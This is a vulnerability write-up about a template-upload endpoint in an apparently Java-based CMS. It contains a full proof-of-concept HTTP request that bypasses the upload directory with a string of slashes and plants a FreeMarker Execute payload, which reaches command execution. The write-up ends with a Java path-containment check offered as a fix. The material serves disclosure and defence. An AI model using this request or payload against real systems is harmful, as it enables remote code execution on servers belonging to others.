ManageFileAction exposes a template upload endpoint, @PostMapping("/uploadTemplate"). The normal upload directory is /template/1/xxx; by changing the directory parameter to a string of slashes, the restriction can be bypassed so that the file lands in the default directory, which makes file overwrite possible.
Change the payload to a command-execution one and try to overwrite index.html, or simply staticize the homepage using about.htm to generate it; visiting the generated page shows that the command was executed.
The request is as follows:
POST /ms/file/uploadTemplate.do HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18073659414194577474845556017
Content-Length: 666
Origin: http://127.0.0.1:8081
DNT: 1
Connection: close
Referer: http://127.0.0.1:8081/ms/template/list.do?template=1/default
Cookie: 略
pageno_cookie=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------18073659414194577474845556017
Content-Disposition: form-data; name="uploadPath"
/////////////////////////////
-----------------------------18073659414194577474845556017
Content-Disposition: form-data; name="uploadFloderPath"
true
-----------------------------18073659414194577474845556017
Content-Disposition: form-data; name="rename"
false
-----------------------------18073659414194577474845556017
Content-Disposition: form-data; name="file"; filename="xxxxx"
Content-Type: image/png
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
-----------------------------18073659414194577474845556017--
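As an added illustration of the server-side check that would stop the directory bypass shown in the uploadPath field above (this is not code from the project; the web root, the "template/<id>" layout and the method name are assumptions), the supplied path is resolved against the web root, normalized, and accepted only if it still lies inside the per-template directory:

```java
import java.nio.file.Path;
import java.nio.file.Paths;

public class TemplateUploadPathCheck {

    /**
     * Resolves the user-supplied uploadPath against the web root and returns the
     * target directory only if it stays inside <webRoot>/template/<templateId>/.
     * Returns null when the request must be rejected.
     * webRoot and the template/<id> layout are assumptions, not the project's real layout.
     */
    public static Path resolveUploadDir(Path webRoot, String templateId, String uploadPath) {
        if (uploadPath == null || uploadPath.isEmpty()) {
            return null;
        }
        // Reject alternate separators and NUL bytes before any path arithmetic
        if (uploadPath.indexOf('\\') >= 0 || uploadPath.indexOf('\0') >= 0) {
            return null;
        }
        Path root = webRoot.toAbsolutePath().normalize();
        Path templateDir = root.resolve("template").resolve(templateId).normalize();

        // Strip leading slashes so that "/////" or "/template/default" is never
        // treated as an absolute filesystem path; an empty remainder is rejected.
        String relative = uploadPath.replaceFirst("^/+", "");
        if (relative.isEmpty()) {
            return null;
        }
        // normalize() collapses "." and ".." segments; then enforce containment
        Path target = root.resolve(relative).normalize();
        if (!target.startsWith(templateDir)) {
            return null;
        }
        return target;
    }

    public static void main(String[] args) {
        Path webRoot = Paths.get("/var/www/ms"); // assumed web root, constructed for this example
        // legitimate per-template directory
        System.out.println(resolveUploadDir(webRoot, "1", "/template/1/xxx"));
        // the all-slashes value from the request above
        System.out.println(resolveUploadDir(webRoot, "1", "/////////////////////////////"));
        // traversal out of the template's own directory
        System.out.println(resolveUploadDir(webRoot, "1", "/template/1/../default"));
    }
}
```

This addresses only the directory bypass; the uploaded content is still a FreeMarker template, so the upload handler must separately restrict what the file may contain or how it is rendered.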